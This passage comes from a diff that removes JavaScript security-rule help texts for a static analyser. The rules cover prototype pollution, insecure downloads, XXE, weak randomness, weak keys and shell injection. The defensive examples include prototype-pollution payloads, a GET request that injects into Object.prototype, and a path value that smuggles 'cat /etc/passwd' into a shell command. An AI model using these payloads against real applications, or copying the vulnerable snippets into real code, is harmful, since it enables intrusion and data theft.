], - "description" : "Modifying an object obtained via a user-controlled property name may\n lead to accidental mutation of the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", - "id" : "js/prototype-polluting-assignment", - "kind" : "path-problem", - "name" : "Prototype-polluting assignment", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/prototype-pollution-utility", - "name" : "js/prototype-pollution-utility", - "shortDescription" : { - "text" : "Prototype-polluting function" - }, - "fullDescription" : { - "text" : "Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", - "markdown" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], - "description" : "Functions recursively assigning properties on objects may be\n the cause of accidental modification of a built-in prototype object.", - "id" : "js/prototype-pollution-utility", - "kind" : "path-problem", - "name" : "Prototype-polluting function", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/prototype-pollution", - "name" : "js/prototype-pollution", - "shortDescription" : { - "text" : "Prototype-polluting merge call" - }, - "fullDescription" : { - "text" : "Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", - "markdown" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], - "description" : "Recursively merging a user-controlled object into another object\n can allow an attacker to modify the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", - "id" : "js/prototype-pollution", - "kind" : "path-problem", - "name" : "Prototype-polluting merge call", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/insecure-download", - "name" : "js/insecure-download", - "shortDescription" : { - "text" : "Download of sensitive file through insecure connection" - }, - "fullDescription" : { - "text" : "Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", - "markdown" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-829" ], - "description" : "Downloading executables and other sensitive files over an insecure connection\n opens up for potential man-in-the-middle attacks.", - "id" : "js/insecure-download", - "kind" : "path-problem", - "name" : "Download of sensitive file through insecure connection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.1" - } - }, { - "id" : "js/xxe", - "name" : "js/xxe", - "shortDescription" : { - "text" : "XML external entity expansion" - }, - "fullDescription" : { - "text" : "Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n", - "markdown" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-611", "external/cwe/cwe-827" ], - "description" : "Parsing user input as an XML document with external\n entity expansion is vulnerable to XXE attacks.", - "id" : "js/xxe", - "kind" : "path-problem", - "name" : "XML external entity expansion", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.1" - } - }, { - "id" : "js/insecure-randomness", - "name" : "js/insecure-randomness", - "shortDescription" : { - "text" : "Insecure randomness" - }, - "fullDescription" : { - "text" : "Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n", - "markdown" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-338" ], - "description" : "Using a cryptographically weak pseudo-random number generator to generate a\n security-sensitive value may allow an attacker to predict what value will\n be generated.", - "id" : "js/insecure-randomness", - "kind" : "path-problem", - "name" : "Insecure randomness", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/insufficient-key-size", - "name" : "js/insufficient-key-size", - "shortDescription" : { - "text" : "Use of a weak cryptographic key" - }, - "fullDescription" : { - "text" : "Using a weak cryptographic key can allow an attacker to compromise security." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n", - "markdown" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-326" ], - "description" : "Using a weak cryptographic key can allow an attacker to compromise security.", - "id" : "js/insufficient-key-size", - "kind" : "problem", - "name" : "Use of a weak cryptographic key", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/shell-command-injection-from-environment", - "name" : "js/shell-command-injection-from-environment", - "shortDescription" : { - "text" : "Shell command built from environment values" - }, - "fullDescription" : { - "text" : "Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters 